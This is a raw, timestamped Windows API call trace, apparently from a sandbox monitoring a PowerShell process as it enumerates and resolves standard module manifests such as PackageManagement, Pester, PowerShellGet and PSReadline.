	[0058.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d230) returned 1
	[0058.473] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.473] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.474] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.475] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.475] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.475] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.475] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 0
	[0058.475] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d180) returned 1
	[0058.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d140) returned 1
	[0058.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.476] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.476] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
	[0058.476] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 0
	[0058.476] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d400) returned 1
	[0058.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3c0) returned 1
	[0058.477] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x184c18ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b
	[0058.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0058.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d110) returned 1
	[0058.477] CloseHandle (hObject=0x8ec) returned 1
	[0058.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.479] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.479] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.479] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 0
	[0058.479] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.479] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.479] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.480] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 0
	[0058.480] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.480] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.480] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.480] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.480] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.481] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.481] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.481] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.481] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.481] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.481] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.482] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.482] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.482] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.482] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.482] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.482] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 0
	[0058.482] FindClose (in: hFindFile=0x1505fc87950 | out: hFindFile=0x1505fc87950) returned 1
	[0058.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.483] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.484] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.486] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.487] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.487] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.487] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.487] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.487] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.487] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 0
	[0058.487] FindClose (in: hFindFile=0x1505fc884f0 | out: hFindFile=0x1505fc884f0) returned 1
	[0058.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d200) returned 1
	[0058.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1c0) returned 1
	[0058.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d230) returned 1
	[0058.488] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.488] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.488] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.489] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.489] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.489] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.489] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.489] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.489] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18cf20 | out: lpFindFileData=0x184c18cf20) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d180) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d140) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d400) returned 1
	[0058.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3c0) returned 1
	[0058.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x184c18ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43
	[0058.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0058.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d110) returned 1
	[0058.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.496] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18cec0 | out: lpFindFileData=0x184c18cec0) returned 1
	[0058.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d200) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1c0) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d230) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d180) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d140) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d400) returned 1
	[0058.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3c0) returned 1
	[0058.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x184c18ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53
	[0058.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0058.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d110) returned 1
	[0058.499] CloseHandle (hObject=0x8ec) returned 1
	[0058.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1d0) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d120) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d0e0) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d040) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf90) returned 1
	[0058.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf50) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d040) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf90) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cf50) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d070) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d030) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d0a0) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cff0) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18cfb0) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d200) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1c0) returned 1
	[0058.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d230) returned 1
	[0058.504] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x184c18ced0 | out: lpFindFileData=0x184c18ced0) returned 0x1505fc884f0
	[0058.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d180) returned 1
	[0058.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d140) returned 1
	[0058.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d400) returned 1
	[0058.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d3c0) returned 1
	[0058.505] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x184c18ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49
	[0058.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1a0) returned 1
	[0058.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d110) returned 1
	[0058.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d520) returned 1
	[0058.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d4e0) returned 1
	[0058.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d550) returned 1
	[0058.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d4a0) returned 1
	[0058.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d460) returned 1
	[0058.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d4f0) returned 1
	[0058.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d440) returned 1
	[0058.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d400) returned 1
	[0058.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d4f0) returned 1
	[0058.508] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d1e0 | out: lpFindFileData=0x184c18d1e0) returned 1
	[0058.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d440) returned 1
	[0058.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d400) returned 1
	[0058.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.509] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.510] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.512] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.513] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d350) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d3c0) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d310) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d360) returned 1
	[0058.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d270) returned 1
	[0058.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d390) returned 1
	[0058.516] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.518] FindNextFileW (in: hFindFile=0x1505fc88730, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 1
	[0058.519] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 1
